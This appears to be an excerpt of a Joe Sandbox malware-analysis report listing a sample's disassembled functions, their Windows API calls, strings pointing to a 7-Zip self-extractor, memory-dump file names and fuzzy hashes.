Instruction Fuzzy Hash: B2315531E04A116BDB266BA9C8159AFB7A58F01724B14047FFD037B3D1DB39AC42C68E

Function 0040161A Relevance: 7.6, APIs: 5, Instructions: 88stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0041E080,?,00920E56,0041E7B8,?,?,?,?,?,?,004019E3), ref: 00401635
??3@YAXPAX@Z.MSVCRT(?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 004016E1
??3@YAXPAX@Z.MSVCRT(?,?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 004016E9
??3@YAXPAX@Z.MSVCRT(?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 004016F8
??3@YAXPAX@Z.MSVCRT(?,?,0000FDE9,00920E58,00000000,?,?,?,?,?,?,004019E3), ref: 00401700

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: a111a310902c598d64a9a5875eea695a509e34d4ca8a34a55aa007f4e1ecc8c3
Instruction ID: 3b55230dadd2a4d047f6e8a8713cbcc3279512281016c63c74d99a53e3c26446
Opcode Fuzzy Hash: a111a310902c598d64a9a5875eea695a509e34d4ca8a34a55aa007f4e1ecc8c3
Instruction Fuzzy Hash: 8D21C232D042159BDB20AB65CC457EAB7B5AF11304F08487BE842B32E1E77A5C85CA4D

Function 00409278 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31

Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

memset.MSVCRT ref: 004092CA
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004092DE
SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 004092FE
GetDlgItem.USER32(?,000004B7), ref: 00409311
SetWindowLongW.USER32(00000000,000000FC,Function_00008190), ref: 0040931F

Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000032), ref: 00408F80
Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000031), ref: 00408F85
Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
Part of subcall function 00408F3F: LoadImageW.USER32(00000000), ref: 00408F91
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FD7
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FE1
Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
Part of subcall function 00408F3F: SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 0040900A
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 00409018
Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
Part of subcall function 00408F3F: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00409040

Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086BB
Part of subcall function 004086A5: SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086CE
Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086E3
Part of subcall function 004086A5: SendMessageW.USER32(00000000,000000B1,00000089,00000089), ref: 004086ED

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
String ID:
API String ID: 358862773-0
Opcode ID: 1bf49a831eb8ff5c5ec00c495e72c7c0aa245b25d53b34aa7426faeff0649c07
Instruction ID: 03ccca4f95bb87f70630d4e99c8394251a1916bed47e60b30c1cc3b52240f206
Opcode Fuzzy Hash: 1bf49a831eb8ff5c5ec00c495e72c7c0aa245b25d53b34aa7426faeff0649c07
Instruction Fuzzy Hash: 5A1186B1E0031467DB10EBA5DD4DF9E77BCAB44B04F00446EB611F32C1DBB8AA448B69

Function 004086A5 Relevance: 7.5, APIs: 5, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B6), ref: 004086BB
SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
GetDlgItem.USER32(?,000004B6), ref: 004086CE

Part of subcall function 00407A0F: SetWindowTextW.USER32(00000000,00000000), ref: 00407A17

GetDlgItem.USER32(?,000004B6), ref: 004086E3
SendMessageW.USER32(00000000,000000B1,00000089,00000089), ref: 004086ED

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Item$FocusMessageSendTextWindow
String ID:
API String ID: 3590784419-0
Opcode ID: fad516354ac438f4a26c589cea41e0691f814e4d079acfbf6477a805b15347a8
Instruction ID: e481abceb184fc0549e30438c3999ed73e1b8a385c7d6d0c75719509d1fab071
Opcode Fuzzy Hash: fad516354ac438f4a26c589cea41e0691f814e4d079acfbf6477a805b15347a8
Instruction Fuzzy Hash: 3EF0EC7110120C7FDB103752DC48D6B7F9DEBC53543014439FA0583120CB766C108B74

Function 00413ABD Relevance: 7.5, APIs: 5, Instructions: 15COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00414380,?,00000000), ref: 00413AC3
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00414380,?,00000000), ref: 00413ACB
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00414380,?,00000000), ref: 00413AD3
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,00414380,?,00000000), ref: 00413ADB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,00414380,?,00000000), ref: 00413AE2

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 65885e07c200fda2b57cfa2a1cc6178dfe62e603f35ddd0798080fd19599c85f
Instruction ID: 781d56d26fbb2de701dc3dac839f3b2d883cb9d7cd57b29d0df98cb94b4adf54
Opcode Fuzzy Hash: 65885e07c200fda2b57cfa2a1cc6178dfe62e603f35ddd0798080fd19599c85f
Instruction Fuzzy Hash: 29D0C731400511BAEA223B16EC1B9C67AB3AF0031830D056FF8871143BDB567CE1DA4C

Function 0040884D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00408579: GetSystemMetrics.USER32(0000000B), ref: 004085A1
Part of subcall function 00408579: GetSystemMetrics.USER32(0000000C), ref: 004085A8

GetSystemMetrics.USER32(00000007), ref: 00408864
GetSystemMetrics.USER32(00000007), ref: 00408875
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040893C

Strings

100%% , xrefs: 00408894, 0040889B, 004088F4

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 12f67b010b6c6ce84eccff202d1a0e8d3bcac39d66bf8899ef5ab7ef9dd2aa27
Instruction ID: 3e0dd225468330a220e365205065e92fc94ece49804654ab909baed5dde81f9a
Opcode Fuzzy Hash: 12f67b010b6c6ce84eccff202d1a0e8d3bcac39d66bf8899ef5ab7ef9dd2aa27
Instruction Fuzzy Hash: 8C31B471A007059FDB24EFAAD9459AEB7F4EF10708B00452ED582A22E1DB78FD44CB99

Function 00405DA5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 004076D3: KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407715
Part of subcall function 004076D3: GetSystemMetrics.USER32(00000011), ref: 00407723

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

wsprintfW.USER32 ref: 00405E48
??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041BBE4,?), ref: 00405E85

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 00405E42
Volumes, xrefs: 00405E1F

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: memcpy$??3@CallbackDispatcherMetricsSystemUserwsprintf
String ID: %X - %03X - %03X - %03X - %03X$Volumes
API String ID: 2991351368-1890733987
Opcode ID: fe1d066e480cc0a8df7484f04aff36523d42970a70a16410e725cc97b66a1737
Instruction ID: ab41b2b7a044f4dbafe54773f7122e0ca5258214a4a67c8b0ba5fddcbcc6d2b4
Opcode Fuzzy Hash: fe1d066e480cc0a8df7484f04aff36523d42970a70a16410e725cc97b66a1737
Instruction Fuzzy Hash: 5821A131D44618AACB15AB91EC16EEEB774EF40704F00417FB516361E6EBB86A84CBC8

Function 004086F9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

SHBrowseForFolderW.SHELL32(?), ref: 00408721
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040873E
SHGetMalloc.SHELL32(00000000), ref: 00408768

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086BB
Part of subcall function 004086A5: SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086CE
Part of subcall function 004086A5: GetDlgItem.USER32(?,000004B6), ref: 004086E3
Part of subcall function 004086A5: SendMessageW.USER32(00000000,000000B1,00000089,00000089), ref: 004086ED

Strings

A, xrefs: 0040871A

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Item$??2@??3@BrowseFocusFolderFromListMallocMessagePathSendmemcpy
String ID: A
API String ID: 593732027-3554254475
Opcode ID: 3aef01d46d1d784e5e29d610c3657d02adb904ff4126155760b37b46b3dd5f1b
Instruction ID: f71166d28af5d16d10e8ce64d0ac3497a8bafdc94a68efcedc6b2873967d7f2a
Opcode Fuzzy Hash: 3aef01d46d1d784e5e29d610c3657d02adb904ff4126155760b37b46b3dd5f1b
Instruction Fuzzy Hash: 1E1124756101089BDB10DBA5D958BEE77FCAF44700F1440AEE505E7240EF79DE04CB65

Function 00407474 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
Part of subcall function 0040439D: wsprintfW.USER32 ref: 00404400
Part of subcall function 0040439D: GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

??3@YAXPAX@Z.MSVCRT(?,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 004074B9

Part of subcall function 00404772: lstrlenW.KERNEL32(?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404781
Part of subcall function 00404772: GetSystemTimeAsFileTime.KERNEL32(00402DFC,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047ED
Part of subcall function 00404772: GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047F4
Part of subcall function 00404772: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C), ref: 004048A6

Strings

PreExtract, xrefs: 0040747A
SfxVarApiPath, xrefs: 004074DB
7ZipSfx.%03x, xrefs: 004074A0

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@File$AttributesPathTempTime$??2@Systemlstrlenmemcpywsprintf
String ID: 7ZipSfx.%03x$PreExtract$SfxVarApiPath
API String ID: 1986220984-914423340
Opcode ID: 4902d0ce1074e967584ec60d0a38107b3532f148ed6ce06a9c2170e3f9388bcb
Instruction ID: 2ce7c900065db82cd6f53f7d938477cc4679eae404a7dae147fc4add6962fe21
Opcode Fuzzy Hash: 4902d0ce1074e967584ec60d0a38107b3532f148ed6ce06a9c2170e3f9388bcb
Instruction Fuzzy Hash: 65F0D670A0810063C704B765D952AEEB7555F81308B10823FE926325E2EF3CA985C6CF

Function 0040842D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00411BBA: memcpy.MSVCRT(00000000,00000000,?,?,?,00000000,004025B9,?,?,0041E788,0040297D,00000000,?,0040508D,?,?), ref: 00411BD6

wsprintfW.USER32 ref: 00408463

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

GetDlgItem.USER32(?,?), ref: 00408485
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00408496

Strings

(%d%s), xrefs: 0040845D

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: memcpy$??3@Itemwsprintf
String ID: (%d%s)
API String ID: 1424909225-2087557067
Opcode ID: 50f8f7e77dcdce2d2851faa96b4847d1a382eb25ef94aa29150f29fce31bd72e
Instruction ID: 9e5063b97f59bed1c8fd24a2ad4692a97a2054891322a5ccd9956e41115b1732
Opcode Fuzzy Hash: 50f8f7e77dcdce2d2851faa96b4847d1a382eb25ef94aa29150f29fce31bd72e
Instruction Fuzzy Hash: 61F0CD71800218BFCB21B755DC05EDE77BCDF04304F10856BF512A11A1DB75AA548F98

Function 00404666 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 00404768

Part of subcall function 0040442E: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,004046CD,00000000,00000000,?,74DF1D70,00000000), ref: 0040445A

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046D9

Part of subcall function 00411CE3: memcpy.MSVCRT(?,?,?,00000000,?,?,004046EB,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 00411D06

??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046F5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046FD

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@memcpy$ByteCharMultiWide
String ID:
API String ID: 1626065140-0
Opcode ID: 93f7aad1806c94775ca1a0d8f3ad7751ed0721520a76da4e217b367523b252c3
Instruction ID: 1758fece63184e570d04f9e3611b3a9f4be235bc0ae71469d74a11a45544da14
Opcode Fuzzy Hash: 93f7aad1806c94775ca1a0d8f3ad7751ed0721520a76da4e217b367523b252c3
Instruction Fuzzy Hash: 123175B3D001199BDB15EBD5CD929EEB7B9AE51315B10003FE902731D1EF386E44D668

Function 00407907 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 0040792E
GetSystemMetrics.USER32(00000031), ref: 00407955
CreateFontIndirectW.GDI32(?), ref: 00407964
DeleteObject.GDI32(00000000), ref: 00407993

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

